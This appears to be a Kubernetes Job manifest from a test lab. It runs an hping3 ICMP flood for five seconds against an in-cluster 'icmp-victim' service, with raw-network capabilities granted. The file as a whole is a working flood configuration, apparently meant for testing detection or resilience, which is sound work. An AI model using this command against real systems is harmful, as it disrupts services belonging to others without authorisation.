# Thanks to https://hub.docker.com/u/olegvorobyov90
apiVersion: batch/v1
kind: Job
metadata:
  name: icmp-flood-job
  namespace: darkforce
  labels:
    app: icmp-flood
spec:
  template:
    metadata:
      labels:
        app: icmp-flood
    spec:
      containers:
      - name: icmp-flood-attack
        image: evantage/attack-leap15:0.1
        command: ["/bin/bash", "-c", "timeout 5 hping3 --icmp --flood -p 80 icmp-victim-0.icmp-victim.avalon.svc.cluster.local || true"]
        securityContext:
          capabilities:
            add:
              - NET_ADMIN
              - NET_RAW
      restartPolicy: Never
  backoffLimit: 0